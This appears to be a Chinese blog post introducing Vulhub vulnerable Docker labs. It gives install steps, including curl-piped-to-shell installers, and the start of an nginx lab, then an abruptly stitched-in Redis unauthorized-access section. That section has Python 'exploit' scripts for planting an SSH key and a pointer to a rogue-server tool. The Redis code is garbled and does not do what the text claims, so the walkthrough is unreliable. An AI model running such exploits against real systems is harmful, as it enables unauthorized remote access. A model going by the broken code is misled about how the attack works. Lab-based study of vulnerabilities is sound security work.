Vulhub 漏洞环境复现环境

Vulhub 简介

漏洞复现不用愁

展示

Vulhub 是预先构建的易受攻击的 docker 环境的开源集合。不需要已有的 docker 知识,只需执行两个简单的命令,您就有了一个易受攻击的环境。

请添加图片描述

安装

在 Ubuntu 20.04 上安装 docker/docker-compose:

# 安装pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3

# 安装最新版docker
curl -s https://get.docker.com/ | sh

# 运行docker服务
systemctl start docker

# 安装 docker compose
pip install docker-compose

其他系统安装方法可参考官方文档:https://docs.docker.com/

用法

复现 nginx 解析漏洞

进入vulhub-master的nginx/nginx_parsing_vulnerability目录下,除了环境之外还有复现过程

请添加图片描述

根据操作步骤

docker-compose up -d 启动容器

### 复现Redis漏洞 #### 准备工作 为了在Vulhub平台上复现Redis未授权访问漏洞,需先搭建好环境。通过克隆[Vulhub](https://github.com/vulhub/vulhub)仓库并进入`redis/unauthorized`目录来启动含有该漏洞的服务实例[^1]。 ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/redis/unauthorized docker-compose up -d ``` 上述命令会拉取必要的Docker镜像并启动容器,模拟存在此安全风险的Redis服务部署场景[^4]。 #### 验证漏洞 一旦服务正常运行,可以通过尝试连接至Redis服务器验证是否存在未授权访问问题: ```bash redis-cli -h <target_ip> ``` 如果能够成功建立连接而无需提供任何凭证,则表明确实存在未授权访问的风险。此时应该可以看到类似如下提示信息,表示已经进入了交互式的Redis命令行界面[^2]。 #### 利用漏洞 对于教育目的而言,下面将以一种较为温和的方式展示可能造成的危害——向目标主机植入SSH密钥对以便后续远程登录测试(请注意仅限于实验环境中操作): 首先准备一个恶意脚本用于触发Redis配置更改行为,例如创建名为`exploit.py`文件内容如下所示: ```python import redis r = redis.Redis(host='<target_ip>', port=6379, db=0) with open('/tmp/id_rsa.pub', 'rb') as f: pub_key = f.read().decode() cmd = "set crackit {}\nsave\n".format(pub_key).encode() r.execute_command('EVAL', cmd.decode(), 0) ``` 接着编写另一个Python脚本来实现将公钥保存到指定位置的功能,命名为`write_sshkey_to_redis.py`: ```python import os from pathlib import Path Path("/root/.ssh").mkdir(parents=True, exist_ok=True) os.system("echo '{}' >> /root/.ssh/authorized_keys".format(input())) ``` 最后利用第三方工具如[nobodyCN开发的redis-rogue-server](https://github.com/n0b0dyCN/redis-rogue-server),按照其README文档指导完成整个攻击链路构建过程[^3]。 需要注意的是以上步骤仅为理论讲解和技术交流之用,请勿非法入侵他人计算机信息系统!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值